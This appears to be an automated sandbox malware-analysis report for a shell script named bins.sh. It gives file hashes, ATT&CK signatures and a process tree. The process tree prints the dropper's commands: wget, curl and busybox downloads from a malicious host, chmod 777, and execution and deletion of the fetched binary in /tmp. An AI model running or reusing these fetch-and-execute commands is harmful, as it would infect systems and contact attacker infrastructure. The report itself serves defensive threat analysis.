Analysis
-
max time kernel
149s -
max time network
13s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 10:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
facd8d5b4de07f8d4d3e00bf507864de
-
SHA1
6b61bfefc5c5b94bbb154d7bfa00d46c67c421a5
-
SHA256
00f8a20ed14d818a6397e452410bbc7ad21628aa1aad3b52031fab9dfcd648ad
-
SHA512
9c32e3e7c4e80b00a5a7cf8ab8d5d4539c19359d0bc62d259b149551d6ef3051a352dde1a701dca898959b6f6d5c1434583f2f992a01caf02fece8a36d5bd721
-
SSDEEP
192:yjojaqBgs6UM43mu0Ay85dgTjF7S7i7DU7wvKhdKHH+5dgTj57S7i7DU7wmhdKHw:yjojaqBgsuAy85dgTjFGuUqC5dgTj5GL
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 685 chmod -
Executes dropped EXE 1 IoCs
Processes:
cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkjioc pid Process /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj 686 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj -
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlwgetcurlbusyboxcQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkjrmpid Process 689 wget 691 curl 661 wget 667 curl 683 busybox 686 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj 688 rm -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curldescription ioc Process File opened for modification /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:650
-
/bin/rm/bin/rm bins.sh2⤵PID:659
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- System Network Configuration Discovery
PID:661
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:667
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- System Network Configuration Discovery
PID:683
-
-
/bin/chmodchmod 777 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj./cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:686
-
-
/bin/rmrm cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- System Network Configuration Discovery
PID:688
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d2⤵
- System Network Configuration Discovery
PID:689
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:691
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801